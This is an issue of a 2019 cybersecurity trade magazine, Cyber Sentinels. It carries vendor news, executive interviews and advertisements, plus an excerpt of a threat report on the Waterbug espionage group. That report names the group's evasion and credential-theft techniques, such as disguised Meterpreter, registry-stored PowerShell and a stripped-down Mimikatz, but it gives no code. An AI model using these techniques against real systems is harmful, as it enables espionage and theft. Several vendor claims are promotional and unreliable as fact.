Cyber Sentinels July 2019 by GEC Media Group

SPECIAL SUPPLEMENT BY

TRENDS FOR CYBER AND INDUSTRIAL SECURITY EXECUTIVES

J U LY 2 0 1 9

GEORGE EAPEN, GROUP CISO, PETROFAC

YOU GOT TO HAVE IT

‘RIGHT’ “Though cybersecurity is a challenging field, with the right skills we stand a greater chance of successfully defending our organizations”....22

CONTENTS JULY 2019

DEEP DIVE

TRENDING

Invisible security

Why is security becoming an important consideration only now?

TOP EXECUTIVE

YOU GOT TO HAVE IT

‘RIGHT’

PARTNER PROGRAM A Winning Strategy

WHITEPAPER Huawei releases white paper on intellectual property

WATERBUG

Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments

REAL-LIFE

Exploit Using Microsoft Excel Power Query for Remote DDE Execution Discovered

SURVEY

VENDOR TALKS Minimizing the Threat Landscape Through Augmenting Human Security Teams

J U LY 2019

TOP OF MIND Addressing the cyber warfare of the future

DEEP DIVE The impersonators of the internet

SearchInform

Epicor ERP Positioned as a Visionary in Gartner 2018 Magic Quadrant for Cloud ERP for Product-Centric Midsize Enterprises

MANAGING DIRECTOR: TUSHAR SAHOO

EDITORIAL

CEO: RONAK SAMANTARAY DIRECTOR & EDITOR: ANUSHREE DIXIT anushree@gecmediagroup.com SUB EDITOR: DIVSHA BHAT divsha@gecmediagroup.com EVENTS EXECUTIVE: SHRIYA NAIR shriya@gecmediagroup.com

THE WEEKEND WORRY! The ransomware attacks planned and deployed on Thursday evenings have been the talk of the town recently. As organizations and the employees gear up for the weekend, there is someone out there waiting for you to shut down the devices for the next two days. What’s next? The entire network is crippled and you are compromised. A few organizations in the UAE (not naming them owing to confidentiality issues) who have been attacked in the last couple of weeks have given in to the attackers’ demand and paid them the ransom in Bitcoins. Indeed, a worry! Specially when we are living and breathing in an era that is defined by cutting edge and ultra-modern, AI embedded superior security solutions. There is an utmost and dire need to raise the bar higher for security professionals and revisit the skill sets. As George Eapen, CISO of Petrofac says ANUSHREE DIXIT “The MENA region is filled with cybersecurity Editor & Director experts. But what we lack is not the quantity anushree@gecmediagroup.com but the quality of people with the RIGHT skills. A person may have a cybersecurity certification but if he or she does not have a specific skill to do the job, if the right attitude, it would be of no use to the organization. My general observation is that there are people around but with missing skills.” Cybersecurity is a vast domain to build expertise in various security subjects like identity and access management, endpoint protection, etc. But George says that the key skill any CISO needs is the presence of mind. “He or she should be a clear thinker and good communicator who can articulate business or cyber risk in a simple language that non-cyber or non-IT people understand. By ensuring that one is not breaking the existing operations or making employee experience difficult, they should always balance the act,” he comments. In this issue we also explore how Aruba is beckoning the CISOs to augment human security teams by readjusting policies and controls. Also in focus is a survey by SearchInform presenting the relevant level of data risk awareness and expertise from across 10 industries, including IT, power engineering, manufacturing and transport, finance and banking, retail, hospitality, healthcare, state defense, logistics and construction. Hope you find it relevant. ë

SALES MANAGER : NEHA SHARMA neha@gecmediagroup.com GROUP SALES HEAD: RICHA S richa@gecmediagroup.com + 971 529 943 982

VISUALIZER: MANAS RANJAN LEAD VISUALIZER: DPR CHOUDHARY DESIGNER: AJAY ARYA ASSISTANT DESIGNER: RAHUL ARYA

SUBSCRIPTIONS INFO@GECMEDIAGROUP.COM SOCIAL MARKETING & DIGITAL COMMUNICATION YASOBANT MISHRA yasobant@gecmediagroup.com

PRINTED BY AL GHURAIR PRINTING & PUBLISHING LLC. MASAFI COMPOUND, SATWA, P.O.BOX: 5613, DUBAI, UAE

I N FO M E DIA PUBLISHED BY ACCENT INFOMEDIA MEA FZ-LLC PO BOX : 500653, DUBAI, UAE 223, BUILDING 9, DUBAI MEDIA CITY, DUBAI, UAE PHONE : +971 (0) 4368 8523 31 FOXTAIL LAN, MONMOUTH JUNCTION, NJ - 08852 UNITED STATES OF AMERICA PHONE NO: + 1 732 794 5918 A PUBLICATION LICENSED BY INTERNATIONAL MEDIA PRODUCTION ZONE, DUBAI, UAE @COPYRIGHT 2013 ACCENT INFOMEDIA. ALL RIGHTS RESERVED. WHILE THE PUBLISHERS HAVE MADE EVERY EFFORT TO ENSURE THE ACCURACY OF ALL INFORMATION IN THIS MAGAZINE, THEY WILL NOT BE HELD RESPONSIBLE FOR ANY ERRORS THEREIN.

J U LY 2 019

NEWS

UAE’s Cyber -threat Landscape Reaches Critical Level: Report DarkMatter Group released the first semi-annual Cyber Security Report for 2019 revealing that critical infrastructure sectors, including Oil & Gas, Financial, Utilities and Transportation, are in the firing line from a growing incidence of cyberattacks across the UAE and wider Middle East. The report analyzes threats and trends observed by DarkMatter between October 2018 and March 2019providing a snapshot of the cybersecurity environment in the UAE and the wider region. The Middle East breaches are both widespread, frequently undetected, and increasingly appear to be state-sponsored. Cybercriminals are aiming their weapons where it hurts the most at critical infrastructure, with potentially devastating effects on the security of nations and their citizens. The report found that the most significant threats to regional critical infrastructure organizations came from eight malicious threat actors and campaigns, motivated by espionage and then sabotage. Spear phishing was found to be the principal method of attack to gain access to targets. “Cybersecurity breaches in the region pose a genuine risk to critical sectors as cybercriminals harness new technologies to launch sophisticated and targeted attacks,” said Karim Sabbagh, CEO of DarkMatter Group. “The intent of the attacks we’re observing is to undermine the progressive social, economic, and digital agendas in the Middle East. Organizations in the region have a short window of time to transform their cybersecurity posture and demonstrate stronger resilience in the face of escalating and increasingly sophisticated cybersecurity threats.”

J U LY 2019

LASERPOWERED SENSOR TO OPEN UP ‘ ANONYMISED’ SECURITY ERA A sensor that uses an array of lasers to detect objects, people and vehicles could herald an era of anonymised surveillance that isolates threats from uninvolved people or objects. Cepton Technologies 3D Lidar detection system, the Vista-Edge™ Perception Evaluation Kit (PEK), combines the unerring accuracy of lasers to scan the environment in much the same way a radar does, but at a much higher resolution, building an image of the world around it regardless of lighting conditions. Presenting the technology in the UK for the first time at IFSEC International in London’s ExCeL on June 20, Cepton’s Neil Huntingdon says that because the device combines the sensor with a powerful micro-computer in a single package it can process the information directly at the “edge”* and highlight only potential threats, such as an intruder or a suspicious package. This then guarantees the anonymity of those not involved in any suspicious incident. Neil, Cepton’s VP of Business Development, said: “Our technology allows for far greater protection of data – because it allows operators to zero in on possible issues in a way other technology cannot. “There are many advantages to this; most notably Lidar can see in the dark, it only transmits a fraction of the information a video would, reducing the burden of data storage and network bandwidth charges, while opening the door to more mobile installations. “Perhaps most importantly it means we can guarantee the anonymity of people or objects not deemed a threat. This is a step-change from existing technology, where everyone’s face is captured and held on video storage, regardless of whether they were involved in an incident or not.” In addition to being more dynamic than video technology, the system has been designed with user simplicity in mind. “You hand someone a camera and they know what it is and what to do with it. This is often not the case with a Lidar and Cepton intends to change that.” said Jerone Floor, Head Of Product at Cepton.

NEWS

People Remain the Biggest Threats to ICS: Survey People remain the greatest threat to industrial control systems (ICS) and associated networks, according to a new SANS survey focused on better understanding cybersecurity risks to operational technology (OT) systems. More than half of respondents also see the cyber risks to their safe and reliable operations as high or higher than in past years. Three hundred and forty-eight security professionals worldwide, representing IT, OT and hybrid IT-OT domains provided their thoughts in the SANS 2019 State of OT/ICS Cybersecurity Survey. Sixty-two percent of those surveyed believe people are the greatest risk to cyber security compromise, trailed by technology (22%) and processes and procedures (14%). “The obvious concern about the risk that people represent—whether they are malicious insiders, careless employees or nation-state bad actors—is consistent across industries,” noted survey co-author and SANS Senior Analyst Barbara Filkins. “We were a little surprised at the lower-ranking concern around process, given that there is significant complexity involved in ICS design, implementation and operation to safeguard OT systems. It’s possible recent attacks that almost always include tried-and-true tactics that exploit human-factors might have impacted our respondents’ perceptions.” Survey takers told SANS that identifying connected assets and gaining visibility into device, network and control system integrity remains an issue: 45.5% consider it a leading focus for their organisations. That aligns with traditional IT

SANS SENIOR ANALYST BARBARA FILKINS & SANS INDUSTRIALS & INFRASTRUCTURE BUSINESS PORTFOLIO DOUG WYLIE

security concerns in which identifying and tracking assets and networks remains a challenge. Not surprisingly, mobile devices (including those used remotely to augment and replace ICS workstations), and wireless communications solutions are contributors to overall risks and threat exposure. Survey co-author and director of SANS

Industrials & Infrastructure business portfolio Doug Wylie said, “We know from previous SANS research that the addition of ‘things’ and mobile devices to ICS represents significant risk. We see in our newest results that practitioners struggle mightily with how to offset these mounting challenges.”

TREND MICRO NAMED LEADER IN ENTERPRISE EMAIL SECURITY BY FORRESTER WAVE Trend Micro Incorporated has been named a leader in enterprise email security in The Forrester Wave™: Enterprise Email Security, Q2 2019 report. Trend Micro earned the highest possible score in the “technology leadership” sub-criterion (under the product strategy criterion), “deployment options” and “cloud integration,” and received the highest score among all

12 appraised vendors in the strategy category. Forrester describes Trend Micro with comments including, “Clients cite effectiveness, ease of deployment, and configurability as strengths.” Forrester additionally said, “Enterprises seeking a solution for defending against malicious and malwareladen emails should consider Trend Micro.”

“The number one threat vector continues to be email, which drives our commitment to continued innovation,” said Dr. Moataz Bin Ali, Vice President Trend Micro Middle East and North Africa. “Analyst evaluations are critical for solution assessment. In my view, this recent report takes into account our newer artificial intelligence (AI)

features such as writing style analysis and computer vision, alongside solutions to protect cloud email platforms like Office 365 and Gmail that collectively helped us block over 41.5 billion threats in 2018.” Nearly 86% of all threats blocked by Trend Micro last year came via email. Phishing, business email compromise (BEC), malicious URLs, malevolent

J U LY 2 019

attachments and accidental and deliberate data loss are all common challenges. Enterprises that use Trend Micro get a winning formula of decades of email security expertise combined with the strategic vision to anticipate the next threats. This combination continues to position Trend Micro as a forefront of the industry.

NEWS

Infoblox Unveils Simplified Security Platform

DAN SCHIAPPA, SENIOR VICE PRESIDENT AND GENERAL MANAGER OF PRODUCTS, SOPHOS

SOPHOS BOOSTS INTERCEPT X FOR SERVER WITH ENDPOINT DETECTION AND RESPONSE

KANAIYA VASANI, EXECUTIVE VICE PRESIDENT OF PRODUCTS AND CORPORATE DEVELOPMENT, INFOBLOX

Infoblox launched BloxOne Threat Defense, the industry’s first hybrid security offering that leverages DNS as the first line of defense to detect and block today’s sophisticated cyberthreats. With a scalable hybrid architecture, BloxOne Threat Defense secures enterprises’ existing networks as well as digital transformations like cloud, IoT and SD-WAN deployments. It makes an organization’s threat analysts more productive and reduces the total cost of enterprise threat defense. The BloxOne Threat Defense solution combines the best of Infoblox’s on-prem (ActiveTrust) and cloud-based (ActiveTrust Cloud) security solutions into a unique integrated hybrid offering that provides enterprises scale, flexibility, and reliability. This enhanced solution reduces incident response time by providing actionable intelligence to the organization’s security stack, including SOAR (Security Orchestration Automation and Response), and by automating action using extensive ecosystem integrations. Enterprises require a scalable, simple, and foundational security solution that can catch threats in today’s dynamic networks. DNS, critical to the fabric of the Internet and any IP based communication, is also the least common denominator that can serve as the perfect foundation for security because it is ubiquitous in networks, is needed for connectivity and can scale to the size of the Internet. BloxOne Threat Defense presents a hybrid deployment that ensures enterprise networks will be protected at anytime, anywhere, leveraging the infrastructure organizations already own – DNS. resiliency and redundancy. “With BloxOne Threat Defense, Infoblox is providing customers with a solution that protects everywhere, offers flexible deployment, and integrates with the security stack already in place, providing a more optimized and streamlined cybersecurity posture,” said Kanaiya Vasani, executive vice president of products and corporate development at Infoblox.

J U LY 2019

Sophos unveiled Intercept X for Server with Endpoint Detection and Response (EDR). By adding EDR to Intercept X for Server, IT managers can investigate cyberattacks against servers, a sought-after target due to the high value of data stored there. Cybercriminals frequently evolve their methods and are now blending automation and human hacking skills to successfully carry out attacks on servers. This new type of blended attack combines the use of bots to identify potential victims with active adversaries making decisions about who and how to attack. The SophosLabs Uncut article, Worms Deliver Cryptomining Malware to Web Servers, underscores how easy it is for cybercriminals to leverage bots to discover soft targets. The report explains an automated attack that can deliver a wide range of malicious code to servers that, as a class, tend to lag behind normal update cycles. Once the bots identify potential targets, cybercriminals use their savvy to select victims based on an organization’s scope of sensitive data or intellectual property, ability to pay a large ransom, or access to other servers and networks. The final steps are cerebral and manual: break in, evade detection and move laterally to complete the mission. This could be to quietly sneak around to steal intelligence and exit unnoticed, disable backups and encrypt servers to demand high-roller ransoms, or use servers as launch pads to attack other companies. “Blended cyberattacks, once a page in the playbook of nation state attackers, are now becoming regular practice for everyday cybercriminals because they are profitable. The difference is that nation state attackers tend to persist inside networks for long lengths of time whereas common cybercriminals are after quick-hit money making opportunities,” said Dan Schiappa, chief product officer, Sophos.

P R E C I S I O N M O B I L E W O R K S TAT I O N S

Create without limits. [The new] Dell Precision mobile workstations excel under your demanding standards. With Intel® Core™ i7 processor, NVIDIA professional graphics and Dell Precision Optimizer, they focus power and speed behind your biggest ideas.

Intel® Core™ i7 processor.

Khalid Bin Alwaleed St. P O Box 42091 Jeddah 21541 Saudi Arabia Tel:+966 2 653 1766

Intel, the Intel Logo, Intel Inside, Intel Core, and Core Inside are trademarks of Intel Corporation or its subsidiaries in the U.S. and/or other countries.

NEWS

Mimecast Names Top Channel Performers at Middle East Partner Connect Mimecast revealed the winners of its Middle East Partner Awards 2019. Five channel partners from the UAE were recognised across six categories for their performance over the past year. Mimecast revealed the winners during its annual Mimecast Partner Connect, held in Dubai, UAE in June 2019. The following partners were recognised as top performers during the prior financial year: l Largest Deal – IDC l Legend of The Year – Sincy Santosh, Bulwark

Technologies Technical Legend of the Year – Deepu Thomas, Bulwark Technologies l Growth Partner of the Year – Cloud Dynamics l Technical Services Partner of the Year - Teksalah l Partner of The Year - Newlogic Mimecast’s Vice President of Channel Operations, Dan Gradidge and Director of Channel Programs, Nikki Downing, attended the event to honour the top performing partners and to provide a comprehensive overview l

of the Mimecast Global Partner Program. As a channel-focused business, Mimecast has worked closely with its regional partners to help them successfully integrate Mimecast solutions into their full suite of ICT solutions under the Global Partner Program. The Program is designed to offer more rewards resellers can leverage to attract new clients into long term business relationships and build their reputations as trusted business advisors. At the event, attendees

received an update on the program and were introduced to collateral and supporting information that can help them offer customers guidance to solve their cyber resilience challenges. Partners also learned more about product roadmaps, the Legendary Customer Success program and Mimecast’s interoperability with several leading complementary technology vendors via its API partnerships “We are privileged to work with some of the best channel partners in

the Middle East who are committed to helping businesses improve their security and compliance, with solutions that mitigate risk and reduce the cost and complexity of becoming cyber resilient organisations,” said Nikki Downing, director of channel programs, Mimecast. “It gives us great pleasure to recognise the passion and commitment of five partners from the region who are committed to helping customers solve their cyber resilience challenges.”

Entrust Datacard Completes Purchase of nCipher Security Entrust Datacard completed its previouslyannounced acquisition of nCipher Security, formerly Thales’s market-leading general purpose hardware security module (HSM) business. The general purpose HSM market is growing quickly, driven by global demand for stronger data and application security, increased encryption, and privacy regulations such as the EU General Data

Protection Regulation (GDPR) and the electronic identification, authentication and trust services (eIDAS) regulation. HSMs offer the highest levels of cryptographic security, and are deployed to minimize network and cybersecurity risks from cloud services and Internet of Things (IoT) devices and other digital initiatives. “We are extremely pleased to complete this acquisition and bring

J U LY 2019

nCipher’s exceptional talent and technology into the Entrust Datacard portfolio. The need for secure network access and data integrity continues to multiply – from mobile devices and cloud services to connected IoT devices and digital payments. The use of HSMs is expanding across all of these domains. With nCipher now part of our solution portfolio, customers will see benefit from our expanded offer-

ings for the most sensitive, high assurance use cases,” said Todd Wilkinson, president and CEO of Entrust Datacard. General purpose HSMs are a core component of Entrust Datacard’s solutions and are an underlying part of the security infrastructure of the company’s public key infrastructure (PKI) and secure sockets layer (SSL) offerings. Entrust Datacard will offer the nCipher solution with its

on-premise and managed PKI offerings, and its IoT device credentialing, authorization and lifecycle management offerings. By joining Entrust Datacard, nCipher will be able to expand its compliance capabilities from trusted hardware to include trusted identities, and grow its cloud capabilities to offer customers more advanced solutions from Entrust Datacard’s secure hosting facilities.

G L O RY AWAITS THE CHAMPIONS

1 ST OCTOBER 2019 FOR MORE VISIT g e c m e d i a g r o u p. c o m

DEEP DIVE

INVISIBLE SECURITY The leaderships at neoEYED are claiming that they are building the next generation of AI, not a simple machine learning algorithm... Something that will make the others’ AIs look like toys. neoEYED AI monitors 100+ behavioral factors to detect anomalies and prevent account takeover in real time.

FRAUDS ARE ON THE RISE! Banks, fintech companies and large enterprises lose millions of $ every year due to security breaches, identity frauds, social engineering frauds, password sharing…. Today, all the frauds happen on an authenticated session leaving for a huge gap to be filled. There are plenty of technologies available on the market to reduce frauds and improve security like biometrics, SMS/OTP, token verification… They help prevent a great deal but they are friction and pose a barrier at entrance to the users ruining the customer experience.

INVISIBLE SECURITY neoEYED is a Behavioral AI. A fraud detection/ prevention solution that recognize the users just by looking at “how” they interact with the applications and type their credentials. It’s a simple package that banks and enterprises can integrate in their web, mobile or internal applications. The AI automatically looks at over 100 of different behavioral patterns in the background, without disturbing the users. The result is a secure, frictionless, layer that continuously monitors the behavior of the users and protects the organization from any unforeseen frauds without asking for any token, permissions or personal information. Invisible, simple, secure!

ALESSIO MAURO

CASE STUDY

CEO, NEOEYED, INC

neoEYED introduced its technology to few of the largest banks in India asking their employees to type their username/password credentials as they normally do on a web portal. Then the users were asked to impersonate via different users by spying and typing their credentials. neoEYED was able to deliver impersonation alerts with 100% accuracy on over 150 fraudulent attempts. All frauds and legitimate users were correctly identified without error just by looking at the way the users typed their username.

This solution won over 12x awards & accolades by NPCI, RBL Bank, PwC, MasterCard, IBM, BBVA, Vizag FinTech Festival, DCB Bank… and today is part of Mach37 Cyber security accelerator, PayPal Incubator, Cultiv8, Catalyst. “neoEYED helps banks and business to reduce up to 99% of frauds with a Behavioural AI that recognise the users just by looking at the way the

J U LY 2019

users interact with their devices. Invisible, simple, secure. Made by a strong team of experts in cybersecurity and biometrics, who won 12 awards all around the world from companies like Mastercard, PwC, IBM, NPCI, BBVA. “ neoEYED Vision: “neoEYED vision is to kill the password one day!” ë

TRENDING

WHY IS SECURITY BECOMING AN IMPORTANT CONSIDERATION ONLY NOW?

Organizations need to keep up to date and beat hackers at their own game. Ersin Uzun, the VP and Director of System Sciences Laboratory at PARC a Xerox company, discusses further on the topic.

Today, cyber security is becoming more important than ever, hackers are getting smarter and constantly changing their tactics. IOT is expanding rapidly and with more connected devices, more personal information is shared online. As a result, hacking tools are becoming more sophisticated. Over the past decade, we’ve seen a proliferation of smart devices that possess the capabilities of information processing and network connectivity. The defining characteristic of the Internet of Things (IoT) is that devices, previously restricted to their physical environment, are now connected to a computer network. This network could be a home network, an industrial intranet or even the whole internet. This means that a device, or a gateway that connects a device to the network, is accessible by someone who presents the right credentials, or bypasses the credentials altogether. As computation and connectivity have become commoditized, they have spawned a plethora of solutions that automate, improve and simplify key tasks in industrial control — from gathering sensor readings on the performance targets of a conveyor-based motor car production line, to verifying the freshness of a food shipment in a smart supply chain, to programming a CNC machine to precisely cut a block of metal into the right shape. They have also, unfortunately, exposed a rich attack surface that can be exploited by malicious hackers. Consider, for example, the infamous Stuxnet worm that was used to attack Iranian nuclear installations. A malicious program was inserted into the unit that controlled the operation of the centrifuges in the nuclear reactor. This program caused infrequent changes in the speed at which the centrifuges rotate, which, over a period of time, would cause the centrifuges to deteriorate and fail. What made Stuxnet extremely hard to

J U LY 2019

ERSIN UZUN,

VICE PRESIDENT, DIRECTOR OF SYSTEM SCIENCES LABORATORY, PARC, A XEROX COMPANY

detect was that the telemetry from the centrifuges was spoofed, i.e., whenever the controller was asked to report the speed of the centrifuges, it would still report benign, expected values rather than the altered velocities induced by the worm.

DESIGNED-IN SECURITY IS A WORTHY OBJECTIVE, BUT HARD TO ACHIEVE It is often claimed that the way to address this new set of cyber-physical security challenges is to construct systems that are “secure by design.” This requires a system designer to develop an understanding of an attacker’s incentives and the various ways in which he or she can compromise the operations of the system. In the recent Mirai botnet attacks, for example, the adversaries accessed their targets using commonly used

default passwords, which had never been altered by their users. This simple attack infiltrated tens of thousands of devices. The goal of designed-in security is to incorporate measures and protocols that will prevent as many known attack scenarios as possible. A bigger challenge for the security engineer is figuring out how to deal with attack methods that are hitherto unknown, and to design the system in such a way that it can mitigate the negative consequences of such novel attacks. This is a precarious undertaking, and for many IoT systems, this type of designed-in security may be hard to achieve. That’s because many systems — think of the smart power grid, portions of which may have been in operation for decades — contain legacy equipment with old processes and protocols that must be brought up to date with current security best practices, a task easier said than done.

IT’S NOT JUST LEGACY DEVICES THAT ARE HARD TO SECURE Some industrial and enterprise applications require a new class of lightweight, low- power, cheap sensors that are deployed in swarms of hundreds or thousands. These devices may power up intermittently or be passive and draw power from other devices in their vicinity. They might engage in opportunistic communication with listening devices in their neighborhood but could remain silent most of the time. The secure communication and storage mechanisms that are typically deployed in cybersecurity solutions are far too complex to be implemented on such lightweight devices. In addition to the conventional protocols for secure communication, secure data storage and key management, we need security approaches that inter-operate across a vast range of device capabilities. ë

PARTNER PROGRAM

A WINNING STRATEGY

Cyber Sentinels in an exclusive interview with Jason Ellis, EMEA VP Channel for FireEye on partner programs, channel strategies and expansion plans.

Tell us about FireEye Fuel Academy. FireEye Fuel Academy is our channel partner event that we host in multiple countries every year. It is an opportunity for FireEye team to meet all the channel partners in the regions, and discuss about the channel strategy. We update them about our business and technical solutions at the event. An intro to the FireEye channel program? What’s in it for the partners? Explain promotions, rebates, SPIFFs, channel focused products? The FireEye partner program is based on a common structure of platinum, gold and silver partners. In the past 12 months, we have initiated a lot of activities that offer additional value to our channel partners. This includes: •Back-end rebate: This a brand new and lucrative program. In this program, if the partners achieve a revenue goal around deal registration, we will pay them a back-end rebate. This program was introduced this year. •Front-end protection: FireEye makes sure that any opportunities registered by our partners are protected. So, we win and lose with our partners who have registered those opportunities. •Incumbency protection program: Under this program, FireEye protects the original license transacted by partners. This means that if any other partner attempts to compete, we will pay a premium versus the incumbent partner. In this scenario, the partner is protected from the original deal registration, the sales on that will go towards the goal and the partners are protected in the future years as well. •SPIFF: This program provides sales performance incentives and recognitions to the sales and technical team members based on the net new customers introduced to FireEye. Also, in order to be much more focused, we have reduced the number of partners in our program. To you give an example – we have

JASON ELLIS, EMEA VP CHANNEL, FIREEYE

halved the number of gold partners. We have applied the similar strategy for our platinum and silver partners. Tell us about your expansion plans in Africa. FireEye is investing heavily in African region. We have about 54 employees in the region and are expanding our territory sales. We see an excellent demand in the region for our services. Provide an outline of future channel plans and how they will be incorporated in the Middle East & Africa region.

FireEye will continue to focus on a target number of partners. Adopting this strategy has been a winning formula for FireEye in terms of driving gross revenue through the channel. Additionally, we will continue to evolve our MSSP Partner Program. Different ways of consuming our technologies on a monthly or annual basis plays an important role when it comes to our channel partners. We will also continue to equip our partners with management tools which will allow them to build services. Focusing on fewer, but more strategic partners, continuing to protect our partners profitability, and modernising how we go to market is going to be our strategy for the future. ë

J U LY 2 019

WHITEPAPER

HUAWEI RELEASES WHITE PAPER ON INTELLECTUAL PROPERTY

Huawei released a white paper on innovation and intellectual property (IP), and warned against the issue being politicized. Speaking at a press conference at the company’s headquarters, Song Liuping, Huawei’s chief legal officer, said that IP is the cornerstone of innovation and its politicization threaten progress across the world. “If politicians use IP as a political tool, they will destroy confidence in the patent protection system. If some governments selectively strip companies of their IP, it will break the foundation of global innovation,” said Song. The paper, titled “Respecting and Protecting Intellectual Property: The Foundation of Innovation,” elaborates on Huawei’s practices in and contributions to innovation and the protection of IPR. It notes that innovation and intellectual property protection lie at the heart of Huawei’s success over more than 30 years. As of the end of 2018, Huawei has been granted 87,805 patents, of which 11,152 are U.S. patents. Since 2015, Huawei has received over 1.4 billion U.S. dollars in licensing revenue. Aside from accumulating patents of its own, Huawei has also paid more than 6 billion U.S. dollars in royalties to legally implement the IP of other companies, with nearly 80% of that paid to American companies, according to the document. Intellectual property is private property, protected by the law, and disputes should be resolved through legal proceedings, said Song, adding that in the past 30 years, no court has ever concluded that Huawei engaged in malicious IP theft, and Huawei has never been required by the court to pay damages for this. Huawei’s collaborative and respectful approach to IP is demonstrated by the simple fact that many of its technology breakthroughs are incorporated into the open standards that govern 3G, 4G and 5G. As a result, even though some countries do not buy products directly from Huawei, they still use the essential patents of Huawei, and share in the benefits of the technology Huawei creates, said Song.

J U LY 2019

DR. SONG LIUPING,

CHIEF LEGAL OFFICER, HUAWEI

Song also addressed Huawei’s stance on its use of patents, saying the company will not weaponize its portfolio of patents. Rather, he said, Huawei will adopt an open and cooperative attitude and follow the FRAND principle, or “fair, reasonable, and non-discriminatory,” when engaging with relevant parties in the industry on patents licensing. “As always, Huawei is ready and willing to share

our technology with the world. That includes 5G. It includes U.S. companies and U.S. consumers. Together, we can drive our industry forward and advance technology for all mankind,” said Song. The document also elaborates on how sustained innovation has helped Huawei’s success; how Huawei’s innovation brings huge social value; and Huawei’s stance on the use of third parties’ IPR and its own. ë

Discover the Edge.

Smart Solutions. Real Business. Rittal solutions for the technology of the future. Edge computing enables enormous amounts of data to be processed directly at the place where they arise. Securely and in real time. Rittal prepares you and your IT infrastructure for new challenges - ďŹ&#x201A;exibly, economically, and globally.

Visit us at

Sheikh Rashid Hall Stand SR-E2

For Enquiries:

Rittal Middle East FZE Tel: +971-4-3416855 I Email: info-it@rittal-middle-east.com I www.rittal.com/uae-en

REAL-LIFE

WATERBUG: ESPIONAGE GROUP ROLLS OUT BRAND-NEW TOOLSET IN ATTACKS AGAINST GOVERNMENTS Waterbug may have hijacked a separate espionage group’s infrastructure during one attack against a Middle Eastern target.

The Waterbug espionage group (aka Turla) has continued to attack governments and international organizations over the past eighteen months in a series of campaigns that have featured a rapidly evolving toolset and, in one notable instance, the apparent hijacking of another espionage group’s infrastructure. Three waves of attacks Recent Waterbug activity can be divided into three distinct campaigns, characterized by differing toolsets. One campaign involved a new and previously unseen backdoor called Neptun (Backdoor.Whisperer). Neptun is installed on Microsoft Exchange servers and is designed to passively listen for commands from the attackers. This passive listening capability makes the malware more difficult to detect. Neptun is also able to download additional tools, upload stolen files, and execute shell commands. One attack during this campaign involved the use of infrastructure belonging to another espionage group known as Crambus (aka OilRig, APT34). A second campaign used Meterpreter, a publicly available backdoor along with two custom loaders, a custom backdoor called photobased. dll, and a custom Remote Procedure Call (RPC) backdoor. Waterbug has been using Meterpreter since at least early 2018 and, in this campaign, used a modified version of Meterpreter, which was encoded and given a .wav extension in order to disguise its true purpose. The third campaign deployed a different custom RPC backdoor to that used in the second campaign. This backdoor used code derived from the publicly available PowerShellRunner tool to execute PowerShell scripts without using powershell.exe. This tool is designed to bypass detection aimed at identifying malicious PowerShell usage. Prior to execution, the PowerShell scripts were stored Base64-encoded in the registry. This was probably done to avoid them being written to the file system.

J U LY 2019

RETOOLED Waterbug’s most recent campaigns have involved a swath of new tools including custom malware, modified versions of publicly available hacking tools, and legitimate administration tools. The group has also followed the current shift towards “living off the land,” making use of PowerShell scripts and PsExec, a Microsoft Sysinternals tool used for executing processes on other systems. Aside from new tools already mentioned above, Waterbug has also deployed: l A new custom dropper typically used to install Neptun as a service. l A custom hacking tool that combines four leaked Equation Group tools (EternalBlue, EternalRomance, DoublePulsar, SMBTouch) into a single executable. l A USB data collecting tool that checks for a connected USB drive and steals certain file types, encrypting them into a RAR file. It then uses WebDAV to upload to a Box cloud drive. l Visual Basic scripts that perform system reconnaissance after initial infection and then send information to Waterbug command and control (C&C) servers. l PowerShell scripts that perform system reconnaissance and credential theft from Windows Credential Manager and then send this information back to Waterbug C&Cs. l Publicly available tools such as IntelliAdmin to execute RPC commands, SScan and NBTScan for network reconnaissance, PsExec for execution and lateral movement, and Mimikatz (Hacktool. Mimikatz) for credential theft, and Certutil.exe to download and decode remote files. These tools were identified being downloaded via Waterbug tools or infrastructure.

VICTIMS These three recent Waterbug campaigns have seen the group compromise governments and international organizations across the globe in

addition to targets in the IT and education sectors. Since early 2018, Waterbug has attacked 13 organizations across 10 different countries:

HIJACKED INFRASTRUCTURE One of the most interesting things to occur during one of Waterbug’s recent campaigns was that during an attack against one target in the Middle East, Waterbug appeared to hijack infrastructure from the Crambus espionage group and used it to deliver malware on to the victim’s network. Press reports have linked Crambus and Waterbug to different nation states. While it is possible that the two groups may have been collaborating, Symantec has found no further evidence to support this. In all likelihood, Waterbug’s use of Crambus infrastructure appears to have been a hostile takeover. Curiously though, Waterbug also compromised other computers on the victim’s network using its own infrastructure. During this attack, a customized variant of the publicly available hacking tool Mimikatz was downloaded to a computer on the victim’s network from known Crambus-controlled network infrastructure. Mimikatz was downloaded via the Powruner tool and the Poison Frog control panel. Both the infrastructure and the Powruner tool have been publicly tied to Crambus by a number of vendors. Both were also mentioned in recent leaks of documents tied to Crambus. Symantec believes that the variant of Mimikatz used in this attack is unique to Waterbug. It was heavily modified, with almost all original code stripped out aside from its sekurlsa::logonpasswords credential stealing feature. Waterbug has frequently made extensive modifications to publicly available tools, something Crambus is not well known for. The variant of Mimikatz used was packed with a custom packing routine that has not been seen before in any non-Waterbug malware. Waterbug

REAL-LIFE

used this same packer on a second custom variant of Mimikatz and on a dropper for the group’s custom Neuron service (Trojan.Cadanif). Its use in the dropper leads us to conclude that this custom packer is exclusively used by Waterbug. Additionally, this version of Mimikatz was compiled using Visual Studio and the publicly available bzip2 library which, although not unique, has been used by other Waterbug tools previously. Aside from the attack involving Crambus infrastructure, this sample of Mimikatz has only been seen used in one other attack, against an education target in the UK in 2017. On that

occasion, Mimikatz was dropped by a known Waterbug tool. In the case of the attack against the Middle Eastern target, Crambus was the first group to compromise the victim’s network, with the earliest evidence of activity dating to November 2017. The first observed evidence of Waterbug activity came on January 11, 2018, when a Waterbuglinked tool (a task scheduler named msfgi.exe) was dropped on to a computer on the victim’s network. The next day, January 12, the aforementioned variant of Mimikatz was downloaded to the same computer from a known Crambus C&C server. Two further computers on the victim’s

